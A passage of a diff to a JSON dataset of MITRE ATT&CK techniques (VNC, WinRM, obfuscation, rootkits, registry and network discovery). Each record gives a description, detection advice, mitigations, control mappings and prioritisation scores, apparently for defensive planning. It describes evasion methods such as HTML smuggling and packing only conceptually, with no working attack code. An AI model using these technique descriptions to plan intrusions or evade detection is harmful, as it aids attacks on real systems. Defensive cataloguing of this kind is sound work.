-                "url": "https://attack.mitre.org/techniques/T1021/005",
-                "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC).  VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)\n\nVNC differs from [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) as VNC is screen-sharing software rather than resource-sharing software. By default, VNC uses the system's authentication, but it can be configured to use credentials specific to VNC.(Citation: MacOS VNC software for Remote Desktop)(Citation: VNC Authentication)\n\nAdversaries may abuse VNC to perform malicious actions as the logged-on user such as opening documents, downloading files, and running arbitrary commands. An adversary could use VNC to remotely control and monitor a system to collect data and information to pivot to other systems within the network. Specific VNC libraries/implementations have also been susceptible to brute force attacks and memory usage exploitation.(Citation: Hijacking VNC)(Citation: macOS root VNC login without authentication)(Citation: VNC Vulnerabilities)(Citation: Offensive Security VNC Authentication Check)(Citation: Attacking VNC Servers PentestLab)(Citation: Havana authentication bug)",
-                "detection": "Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.\n\nOn macOS systems log show --predicate 'process = \"screensharingd\" and eventMessage contains \"Authentication:\"' can be used to review incoming VNC connection attempts for suspicious activity.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nMonitor for use of built-in debugging environment variables (such as those containing credentials or other sensitive information) as well as test/default users on VNC servers, as these can leave openings for adversaries to abuse.(Citation: Gnome Remote Desktop grd-settings)(Citation: Gnome Remote Desktop gschema)",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
-                    },
-                    {
-                        "mid": "M1033",
-                        "name": "Limit Software Installation",
-                        "description": "Block users or groups from installing unapproved software.",
-                        "url": "https://attack.mitre.org/mitigations/M1033"
-                    }
-                ]
-            },
-            {
-                "tid": "T1021.006",
-                "name": "Remote Services: Windows Remote Management",
-                "url": "https://attack.mitre.org/techniques/T1021/006",
-                "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\n\nWinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014) WinRM  can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).(Citation: MSDN WMI)",
-                "detection": "Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior.  Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.(Citation: Medium Detecting Lateral Movement) Also monitor for remote WMI connection attempts (typically over port 5985 when using HTTP and 5986 for HTTPS).",
-                "mitigations": [
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1030",
-                        "name": "Network Segmentation",
-                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                        "url": "https://attack.mitre.org/mitigations/M1030"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
-            }
-        ],
-        "mitigations": [
-            {
-                "mid": "M1032",
-                "name": "Multi-factor Authentication",
-                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
-                "url": "https://attack.mitre.org/mitigations/M1032"
-            },
-            {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
             }
         ],
-        "cumulative_score": 1.5922426661904763,
-        "adjusted_score": 1.5922426661904763,
-        "has_car": true,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "cumulative_score": 0.23333333333333334,
+        "adjusted_score": 0.23333333333333334,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "4.7",
-            "5.3",
-            "6.1",
-            "6.2",
-            "6.4",
-            "6.5",
-            "6.8"
+            "2.3",
+            "2.5",
+            "4.1",
+            "4.8",
+            "18.3",
+            "18.5"
         ],
         "nist_controls": [
-            "AC-17",
-            "AC-2",
-            "AC-20",
-            "AC-3",
-            "AC-5",
-            "AC-6",
-            "AC-7",
-            "CM-5",
+            "AC-18",
+            "CM-2",
             "CM-6",
-            "IA-2",
-            "IA-5",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SI-3",
             "SI-4"
         ],
         "process_coverage": true,
         "network_coverage": true,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.4761904761904762,
-            "mitigation_score": 0.34545454545454546,
-            "detection_score": 0.62
-        },
-        "choke_point_score": 0.45,
-        "prevalence_score": 0.66605219
+        "hardware_coverage": false
     },
     {
-        "tid": "T1025",
-        "name": "Data from Removable Media",
-        "description": "Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. \n\nSome adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.",
-        "url": "https://attack.mitre.org/techniques/T1025",
+        "tid": "T1012",
+        "name": "Query Registry",
+        "description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\n\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
+        "url": "https://attack.mitre.org/techniques/T1012",
         "tactics": [
-            "Collection"
+            "Discovery"
         ],
-        "detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nInteraction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075) or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
             "Command: Command Execution",
-            "File: File Access"
+            "Process: OS API Execution",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Access"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [],
-        "mitigations": [
-            {
-                "mid": "M1057",
-                "name": "Data Loss Prevention",
-                "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
-                "url": "https://attack.mitre.org/mitigations/M1057"
-            }
-        ],
-        "cumulative_score": 0.24285714285714285,
-        "adjusted_score": 0.24285714285714285,
-        "has_car": false,
-        "has_sigma": false,
-        "has_es_siem": false,
-        "has_splunk": false,
+        "mitigations": [],
+        "cumulative_score": 0.5552685161904761,
+        "adjusted_score": 0.5552685161904761,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
         "cis_controls": [],
-        "nist_controls": [
-            "AC-16",
-            "AC-2",
-            "AC-23",
-            "AC-3",
-            "AC-6",
-            "CM-12",
-            "CP-9",
-            "MP-7",
-            "SA-8",
-            "SC-13",
-            "SC-28",
-            "SC-38",
-            "SC-41",
-            "SI-3",
-            "SI-4"
-        ],
+        "nist_controls": [],
         "process_coverage": true,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.14285714285714285,
-            "mitigation_score": 0.2727272727272727
+            "combined_score": 0.07619047619047618,
+            "detection_score": 0.16
         },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "choke_point_score": 0.35,
+        "prevalence_score": 0.12907804
     },
     {
-        "tid": "T1027",
-        "name": "Obfuscated Files or Information",
-        "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. \n\nPayloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used during Initial Access or later to mitigate detection. Sometimes a user's action may be required to open and [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) for [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) Adversaries may also used compressed or archived scripts, such as JavaScript. \n\nPortions of files can also be encoded to hide the plain-text strings that would otherwise help defenders with discovery. (Citation: Linux/Cdorked.A We Live Security Analysis) Payloads may also be split into separate, seemingly benign files that only reveal malicious functionality when reassembled. (Citation: Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and application control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) ",
-        "url": "https://attack.mitre.org/techniques/T1027",
+        "tid": "T1014",
+        "name": "Rootkit",
+        "description": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) \n\nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)",
+        "url": "https://attack.mitre.org/techniques/T1014",
         "tactics": [
             "Defense Evasion"
         ],
-        "detection": "Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system). \n\nFlag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''\"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016) \n\nObfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection. \n\nThe first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network. ",
+        "detection": "Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)",
         "platforms": [
             "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Command: Command Execution",
-            "File: File Creation",
-            "File: File Metadata",
-            "Process: Process Creation"
+            "Drive: Drive Modification",
+            "Firmware: Firmware Modification"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1027.001",
-                "name": "Obfuscated Files or Information: Binary Padding",
-                "url": "https://attack.mitre.org/techniques/T1027/001",
-                "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. \n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) ",
-                "detection": "Depending on the method used to pad files, a file-based signature may be capable of detecting padding using a scanning or on-access based tool.  When executed, the resulting process from padded files may also exhibit other behavior characteristics of being used to conduct an intrusion such as system and network information Discovery or Lateral Movement, which could be used as event indicators that point to the source file. ",
-                "mitigations": []
-            },
-            {
-                "tid": "T1027.002",
-                "name": "Obfuscated Files or Information: Software Packing",
-                "url": "https://attack.mitre.org/techniques/T1027/002",
-                "description": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.  ",
-                "detection": "Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.",
-                "mitigations": [
-                    {
-                        "mid": "M1049",
-                        "name": "Antivirus/Antimalware",
-                        "description": "Use signatures or heuristics to detect malicious software.",
-                        "url": "https://attack.mitre.org/mitigations/M1049"
-                    }
-                ]
-            },
-            {
-                "tid": "T1027.003",
-                "name": "Obfuscated Files or Information: Steganography",
-                "url": "https://attack.mitre.org/techniques/T1027/003",
-                "description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a threat group used Invoke-PSImage to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)  ",
-                "detection": "Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings or other signatures left in system artifacts related to decoding steganography.",
-                "mitigations": []
-            },
-            {
-                "tid": "T1027.004",
-                "name": "Obfuscated Files or Information: Compile After Delivery",
-                "url": "https://attack.mitre.org/techniques/T1027/004",
-                "description": "Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)\n\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Phishing](https://attack.mitre.org/techniques/T1566). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)",
-                "detection": "Monitor the execution file paths and command-line arguments for common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior. The compilation of payloads may also generate file creation and/or file write events. Look for non-native binary formats and cross-platform compiler and execution frameworks like Mono and determine if they have a legitimate purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these should only be used in specific and limited cases, like for software development.",
-                "mitigations": []
-            },
-            {
-                "tid": "T1027.005",
-                "name": "Obfuscated Files or Information: Indicator Removal from Tools",
-                "url": "https://attack.mitre.org/techniques/T1027/005",
-                "description": "Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.\n\nA good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.",
-                "detection": "The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network.",
-                "mitigations": []
-            },
-            {
-                "tid": "T1027.006",
-                "name": "Obfuscated Files or Information: HTML Smuggling",
-                "url": "https://attack.mitre.org/techniques/T1027/006",
-                "description": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)\n\nAdversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as text/plain and/or text/html. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.\n\nFor example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as msSaveBlob.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)",
-                "detection": "Detection of HTML Smuggling is difficult as HTML5 and JavaScript attributes are used by legitimate services and applications. HTML Smuggling can be performed in many ways via JavaScript, developing rules for the different variants, with a combination of different encoding and/or encryption schemes, may be very challenging.(Citation: Outlflank HTML Smuggling 2018) Detecting specific JavaScript and/or HTML5 attribute strings such as Blob, msSaveOrOpenBlob, and/or download may be a good indicator of HTML Smuggling. These strings may also be used by legitimate services therefore it is possible to raise false positives.\n\nConsider monitoring files downloaded from the Internet, possibly by HTML Smuggling, for suspicious activities. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.",
-                "mitigations": []
-            }
-        ],
-        "mitigations": [
-            {
-                "mid": "M1049",
-                "name": "Antivirus/Antimalware",
-                "description": "Use signatures or heuristics to detect malicious software.",
-                "url": "https://attack.mitre.org/mitigations/M1049"
-            },
-            {
-                "mid": "M1040",
-                "name": "Behavior Prevention on Endpoint",
-                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                "url": "https://attack.mitre.org/mitigations/M1040"
-            }
-        ],
-        "cumulative_score": 1.4943144814285714,
-        "adjusted_score": 1.4943144814285714,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.11992208904761906,
+        "adjusted_score": 0.11992208904761906,
         "has_car": false,
         "has_sigma": true,
-        "has_es_siem": true,
+        "has_es_siem": false,
         "has_splunk": true,
-        "cis_controls": [
-            "10.1",
-            "10.2",
-            "10.7",
-            "13.2",
-            "13.7"
-        ],
-        "nist_controls": [
-            "CM-2",
-            "CM-6",
-            "SI-2",
-            "SI-3",
-            "SI-4",
-            "SI-7"
-        ],
-        "process_coverage": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
         "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
+        "hardware_coverage": true,
         "actionability_score": {
-            "combined_score": 0.5714285714285714,
-            "mitigation_score": 0.2,
-            "detection_score": 0.98
+            "combined_score": 0.019047619047619046,
+            "detection_score": 0.04
         },
-        "choke_point_score": 0.15000000000000002,
-        "prevalence_score": 0.77288591
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00087447
     },
     {
-        "tid": "T1029",
-        "name": "Scheduled Transfer",
-        "description": "Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.\n\nWhen scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).",
-        "url": "https://attack.mitre.org/techniques/T1029",
+        "tid": "T1016",
+        "name": "System Network Configuration Discovery",
+        "description": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).\n\nAdversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next. ",
+        "url": "https://attack.mitre.org/techniques/T1016",
         "tactics": [
-            "Exfiltration"
+            "Discovery"
         ],
-        "detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious.",
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
         "platforms": [
             "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Flow"
+            "Command: Command Execution",
+            "Process: OS API Execution",
+            "Process: Process Creation",
+            "Script: Script Execution"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
-        "subtechniques": [],
-        "mitigations": [
+        "subtechniques": [
             {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
+                "tid": "T1016.001",
+                "name": "System Network Configuration Discovery: Internet Connection Discovery",
+                "url": "https://attack.mitre.org/techniques/T1016/001",
+                "description": "Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert, and GET requests to websites.\n\nAdversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.",
+                "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Command and Control, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to check Internet connectivity.",
+                "mitigations": []
             }
         ],
-        "cumulative_score": 0.19047619047619047,
-        "adjusted_score": 0.19047619047619047,
+        "mitigations": [],
+        "cumulative_score": 0.20546772095238097,
+        "adjusted_score": 0.20546772095238097,
         "has_car": true,
-        "has_sigma": false,
-        "has_es_siem": false,
-        "has_splunk": false,
-        "cis_controls": [
-            "13.3",
-            "13.8"
-        ],
-        "nist_controls": [
-            "AC-4",
-            "CA-7",
-            "CM-2",
-            "CM-6",
-            "SC-7",
-            "SI-3",
-            "SI-4"
-        ],
-        "process_coverage": false,
-        "network_coverage": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
         "file_coverage": false,
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.09047619047619047,
-            "mitigation_score": 0.16363636363636364,
-            "detection_score": 0.01
+            "combined_score": 0.08095238095238096,
+            "detection_score": 0.17
         },
         "choke_point_score": 0.1,
-        "prevalence_score": 0
+        "prevalence_score": 0.02451534
     },
     {
-        "tid": "T1030",
-        "name": "Data Transfer Size Limits",
-        "description": "An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.",
-        "url": "https://attack.mitre.org/techniques/T1030",
+        "tid": "T1016.001",
+        "name": "System Network Configuration Discovery: Internet Connection Discovery",
+        "description": "Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert, and GET requests to websites.\n\nAdversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.",
+        "url": "https://attack.mitre.org/techniques/T1016/001",
         "tactics": [
-            "Exfiltration"
+            "Discovery"
         ],
-        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Command and Control, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to check Internet connectivity.",
         "platforms": [
             "Linux",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Network Traffic: Network Connection Creation",
-            "Network Traffic: Network Traffic Flow"
+            "Command: Command Execution",
+            "Process: Process Creation"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1016",
         "subtechniques": [],
-        "mitigations": [
-            {
-                "mid": "M1031",
-                "name": "Network Intrusion Prevention",
-                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
-                "url": "https://attack.mitre.org/mitigations/M1031"
-            }
-        ],
-        "cumulative_score": 0.19523809523809524,
-        "adjusted_score": 0.19523809523809524,
+        "mitigations": [],
+        "cumulative_score": 0.10476190476190476,
+        "adjusted_score": 0.10476190476190476,
         "has_car": false,
-        "has_sigma": true,
+        "has_sigma": false,
         "has_es_siem": false,
-        "has_splunk": false,
-        "cis_controls": [
-            "13.3",
-            "13.8"
-        ],
-        "nist_controls": [
-            "AC-4",
-            "CA-7",
-            "CM-2",
-            "CM-6",
-            "SC-7",
-            "SI-3",
-            "SI-4"
-        ],
-        "process_coverage": false,
-        "network_coverage": true,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
